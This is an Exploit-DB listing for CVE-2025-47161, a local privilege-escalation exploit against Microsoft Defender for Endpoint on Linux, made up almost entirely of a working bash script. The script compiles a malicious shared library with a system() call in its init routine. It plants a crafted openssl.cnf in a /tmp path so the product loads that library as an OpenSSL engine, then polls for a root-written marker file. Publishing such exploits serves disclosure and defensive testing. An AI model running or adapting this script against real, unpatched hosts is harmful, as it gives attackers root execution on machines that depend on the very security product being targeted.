Microsoft Defender for Endpoint (MDE) - Elevation of Privilege

EDB-ID:

52355


Author:

Rich Mirch

Type:

local


Platform:

Multiple

Date:

2025-07-08


#!/bin/bash
# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
# Date: 2025-05-27
# Exploit Author: Rich Mirch
# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
# Software Link:
https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
# Versions:
# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
# Vulnerable Feb-2025 Build: 101.24122.0008  20.124112.0008.0
# Vulnerable Feb-2025 Build: 101.24112.0003  30.124112.0003.0
# Vulnerable Jan-2025 Build: 101.24112.0001   30.124112.0001.0
# Vulnerable Jan-2025 Build: 101.24102.0000  30.124102.0000.0
#
# Vendor Advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
# Blog: http://stratascale.com/vulnerability-alert-cve202547161
# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
# CVE : CVE-2025-47161
#
echo "MDE Version: $(mdatp version)"

# stage
cat >mde-exp.c<<EOF
/*
* Build procedure:
* gcc -fPIC -o woot.o -Wall -c woot.c
* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

void woot(){
    // for manual testing
    if(isatty(STDERR_FILENO)) {
        fprintf(stderr,"Woot!\n");
    }
    system("ps -ef > /woot.txt");
    sleep(3000000);
}

EOF

# build exploit
gcc -fPIC -o woot.o -Wall -c mde-exp.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o

mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/

cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
<<EOF
# Malicious openssl.cnf
openssl_conf = openssl_init
[openssl_init]
engines = engine_section

[engine_section]
woot = woot_section

[woot_section]
engine_id = woot
dynamic_path = /tmp/woot.so
init = 0
EOF

echo "Checking every 15 seconds for /woot.txt"
while true
do
    if [[ -f /woot.txt ]]
    then
        echo "WOOT - /woot.txt exists"
    ls -ld /woot.txt
    exit
    fi
    sleep 15
done